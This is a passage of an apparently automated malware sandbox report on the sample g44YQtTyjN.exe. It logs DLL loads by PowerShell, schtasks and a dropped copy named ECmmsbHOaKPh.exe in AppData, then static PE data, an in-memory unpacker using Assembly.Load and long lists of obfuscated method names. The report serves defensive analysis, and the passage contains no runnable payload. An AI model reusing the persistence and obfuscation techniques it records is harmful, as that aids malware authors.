                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: g44YQtTyjN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: g44YQtTyjN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: g44YQtTyjN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: W.pdb4 source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: GCbd.pdbSHA256 source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
                    Source: Binary string: GCbd.pdb source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.cs.Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.cs.Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.ECmmsbHOaKPh.exe.3b5a528.3.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.cs.Net Code: NNIop5eGT2 System.Reflection.Assembly.Load(byte[])
                    Source: g44YQtTyjN.exeStatic PE information: 0xA26C8D88 [Mon May 8 14:51:52 2056 UTC]
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06787750 push cs; ret 0_2_06787751
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042C54C push eax; retf 12_2_0042C60D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042C972 pushad ; retf 12_2_0042C9B1
                    Source: g44YQtTyjN.exeStatic PE information: section name: .text entropy: 7.801835845620538
                    Source: ECmmsbHOaKPh.exe.0.drStatic PE information: section name: .text entropy: 7.801835845620538
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, of7Q4QO6JZ92cL8skG.csHigh entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nZxLbZRMVbxYFIH9ju.csHigh entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, XQBK8nGo7LpSkIBpXkD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, EFYsb3CWYCN3jQC6J2.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Aio5xEzmfoII3vyFUn.csHigh entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, qpHKcbx1HPcRRb4eZv.csHigh entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, bc7CIFrDHpVetg05d2.csHigh entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, c7051ZPN8xVt8hUhsG.csHigh entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, tpKlUohfpdkCkT7o9Y.csHigh entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, NtTVCc6N7Ct9aKDB26.csHigh entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Syve8TXhcAAxKpmLB6.csHigh entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, itERePonfX9tNyRiRG.csHigh entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, CFoKjxka7clapO4nEJ.csHigh entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, gBm1jOGSdUP4bMbEH8G.csHigh entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, NUuG2imYy55Q63T4jn.csHigh entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, k5AhtwGn8mQJvWh94Cv.csHigh entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, w8K33CGGhnmZMn6ODNQ.csHigh entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, H3r56utoOsfimPxpGK.csHigh entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, OhMjImvU5OtkHhWlnT.csHigh entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, hNJkaAD7i6mbUvTth2.csHigh entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, nE18TyFNSpZFYFqNG7.csHigh entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, maKQ0yStCWeKTLZjv6.csHigh entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, Kt7WdEYHTK9vudn78X.csHigh entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 0.2.g44YQtTyjN.exe.b000000.7.raw.unpack, S4ZPw5HLP8SKw4yP9A.csHigh entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, of7Q4QO6JZ92cL8skG.csHigh entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nZxLbZRMVbxYFIH9ju.csHigh entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, XQBK8nGo7LpSkIBpXkD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, EFYsb3CWYCN3jQC6J2.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Aio5xEzmfoII3vyFUn.csHigh entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, qpHKcbx1HPcRRb4eZv.csHigh entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, bc7CIFrDHpVetg05d2.csHigh entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, c7051ZPN8xVt8hUhsG.csHigh entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, tpKlUohfpdkCkT7o9Y.csHigh entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, NtTVCc6N7Ct9aKDB26.csHigh entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Syve8TXhcAAxKpmLB6.csHigh entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, itERePonfX9tNyRiRG.csHigh entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, CFoKjxka7clapO4nEJ.csHigh entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, gBm1jOGSdUP4bMbEH8G.csHigh entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, NUuG2imYy55Q63T4jn.csHigh entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
